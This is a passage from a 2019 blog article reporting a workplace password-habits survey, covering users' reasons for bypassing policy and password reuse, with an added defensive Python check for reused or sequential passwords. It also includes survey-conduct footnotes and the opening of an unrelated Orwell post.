  6. Management Privileges––Senior employees believe that they are too busy to be expected to follow what they perceive as petty rules (which IT and InfoSec themselves are often known to disregard).
  7. Relevancy––Some users believe they and their systems are not important enough to merit serious attention from an attacker. Some users also believe that rigorous passwords are neither truly realistic nor necessary and they do not see following information security policies as being relevant to their job requirements and/or professional reputation.

Security, Perception vs. Reality
Another interesting self-contradiction that affected user perception of password security was password reuse. When questioned about the practice of resetting passwords to previous ones, a large number of administrative users and developers stated that, whenever the system permitted, they did reset the new password to an older, familiar one. In some cases administrators deliberately disabled password expiration policies in order to avoid the hassle. Clearly, this practice completely defeats any advantages associated with frequent password changes.

Chart 11: Changed passwords back to original password (left: administrators; right: developers)
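A password-change check covering both behaviours described above: sequential passwords (Pa$$w0rd_1 to Pa$$w0rd_2) and resets to an older, familiar password. This is an added example, not code from the survey or any system it examined; the function names, the PBKDF2 iteration count, and the counter span of 3 are assumptions.

```python
import hashlib
import hmac
import os
import re

ITERATIONS = 100_000  # assumed work factor; set to your own policy
LAST_DIGIT_RUN = re.compile(r"^(.*?)(\d+)(\D*)$")

def hash_password(password, salt=None):
    """Return (salt, digest) for storage in the password history."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, digest

def matches(password, entry):
    """Constant-time comparison of a candidate against one history entry."""
    salt, digest = entry
    return hmac.compare_digest(hash_password(password, salt)[1], digest)

def counter_variants(password, span=3):
    """Yield passwords differing from `password` only by a nearby value of
    its last digit run (Pa$$w0rd_3 -> Pa$$w0rd_2, Summer2019! -> Summer2018!)."""
    m = LAST_DIGIT_RUN.match(password)
    if not m:
        return
    stem, digits, tail = m.groups()
    n = int(digits)
    for k in range(max(0, n - span), n + span + 1):
        if k != n:
            yield f"{stem}{k:0{len(digits)}d}{tail}"  # keeps zero padding

def check_new_password(new, current, history):
    """Return 'reused', 'sequential', or None if the change is acceptable.

    `current` is the plaintext the user just authenticated with; `history`
    holds (salt, digest) pairs only, so old passwords are never stored in
    the clear. Variants of the *new* password are hashed against history."""
    if new == current or any(matches(new, e) for e in history):
        return "reused"
    for variant in counter_variants(new, span=3):
        if variant == current or any(matches(variant, e) for e in history):
            return "sequential"
    return None

if __name__ == "__main__":
    # Constructed sample data, not taken from the survey.
    history = [hash_password("Pa$$w0rd_1"), hash_password("Tr0ub4dor&3")]
    for candidate in ("Pa$$w0rd_1", "Pa$$w0rd_3", "correct horse battery staple"):
        print(candidate, "->", check_new_password(candidate, "Pa$$w0rd_2", history))
```

Each variant costs one PBKDF2 computation per history entry, so the span and the history length bound the extra work done on every password change.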

When we asked the users for their rationale for ignoring security policy directives and making this and other judgment calls, the answers clustered around these topics:

  1. Lack of account privacy affected general work habits and security––When users were regularly forced to write down their passwords because they lacked a tool to manage them properly, they also tended to justify keeping other sensitive information out in the open.
  2. Security mandates elicited strong emotional reactions––Users often spoke in emotional terms about unrealistic decrees, using terms like: “smoke and mirrors”, “lip service”, and “window dressing”. Furthermore, they said that they wanted their information to be secure and private but at the same time they had a fatalistic attitude towards security. That is, they felt resigned to accepting security breaches and privacy compromises.
  3. Inability to differentiate between security and privacy––Users didn’t distinguish between these two concepts and mostly focused on the outcome of a security breach and its impact on their work product. In one example, an administrator did not consider the common practice of shared usage of passwords by a fellow administrator to be a privacy or a security issue. When their password was discovered during the survey, they simply mitigated the damage by resetting the password and continuing the sharing practice.
  4. Multi-user applications and social interactions influenced information sharing––Collaborative work assignments and certain business processes promoted password sharing. When it comes to account and password privacy, users working in a collaborative environment tended to have a more liberal and collective sense of account ownership.
  5. Few differences existed between home and business account management practices––Users’ lack of concern for account privacy did not depend on their work location. They were consistent in their practices whether at home or at work. Remote users who connected via VPN were less concerned about the security of their work files because they considered the likelihood of someone hacking them at home to be minimal, despite the fact that their off-site network was much less secure (many had no firewalls or up to date anti-malware protection). Also, most users working from home did not consider themselves to be a potential target of an attack.

Conclusion
The survey results suggest that the widespread practice of users writing down passwords and keeping them in unsecured locations is a natural response to unrealistic security mandates. Users in general are concerned with productivity and view password management as an overhead and a dreaded chore.

Practical password security depends on the availability of password management and enforcement mechanisms. Any password policy must on one hand balance the benefits of protection and enforcement and on the other minimize user impact. Without maintaining this careful balance, we run the risk of users coming to view policy mandates such as expiring passwords as tyrannical decrees that should be cleverly circumvented.

If a good personal and corporate security strategy depends on strong passwords (and few will argue that it does not), then the keystone of good password security is the establishment of an enterprise-wide solution that will either completely eliminate passwords or facilitate the management of the entire password life cycle via on-line, mobile, and off-line access.

Or as Milton Waddams would say, “Well, Ok. But… that’s the last straw. And, and I’m telling you It’s not okay because if they lock me out again and force me to memorize another complex password, I’m I’ll, I’ll, set the building on fire…”

 

Notes and References
Authentication in Internet Banking: A Lesson in Risk Management – FDIC (2007)
Uncovering Password Habits – Are Users’ Password Security Habits Improving?
The death of passwords is premature – Keeper (2016)
Microsoft admits expiring-password rules are useless – CNet (2019)

[1] Due to the sensitive nature of password surveys, conducting password storage searches should be planned and executed carefully and discreetly. Before conducting any searches, you should secure written approval from your IT, InfoSec, HR, and legal team. You should also coordinate all such activities with the local facilities team. Another good rule of thumb is to conduct all surveys in a team composed of representatives from HR and building security; this will eliminate the perception that some unknown individual is just pillaging and violating the privacy of employees after hours. Follow-up conversations with users regarding their password storage and recovery habits should be done in a private setting in a non-threatening, non-confrontational manner. You should make it clear to the interviewee that their cooperation is appreciated, that this will not reflect poorly on their evaluation, and that the ultimate goal of this exercise is to help improve both personal and corporate data security and privacy. A $20 gift certificate to Starbucks or another popular outlet would go a long way towards easing the tensions.

[2] C. Coombs, R. Dawes, and A. Tversky, Mathematical Psychology: An Elementary Introduction. Prentice-Hall Press (1970); Yan, Blackwell, Anderson, and Grant, “The Memorability and Security of Passwords – Some Empirical Results” (research paper, Cambridge University Computer Laboratory, 2001); and Miller, George A. (1956). The magical number seven, plus or minus two: Some limits on our capacity for processing information. Psychological Review, 63, 81-97.

[3] Schneier on Security, Write Down Your Password (2005)

[4] Spafford, Eugene H. (1992). “Observations on reusable password choices.” Proceedings of the 3rd Security Symposium. Usenix, September.

 

© Copyright 2019 Yaacov Apelbaum, All Rights Reserved.

Two and Two Makes Five

It’s the 70th anniversary of Orwell’s 1984.

“There will be no curiosity, no enjoyment of the process of life. All competing pleasures will be destroyed. But always— do not forget this, Winston— always there will be the intoxication of power, constantly increasing and constantly growing subtler. Always, at every moment, there will be the thrill of victory, the sensation of trampling on an enemy who is helpless.
If you want a picture of the future, imagine a boot stamping on a human face— forever. ”
― George Orwell, 1984 – Part 3, Chapter 4

Field Guide to the Progressive Movement Medals
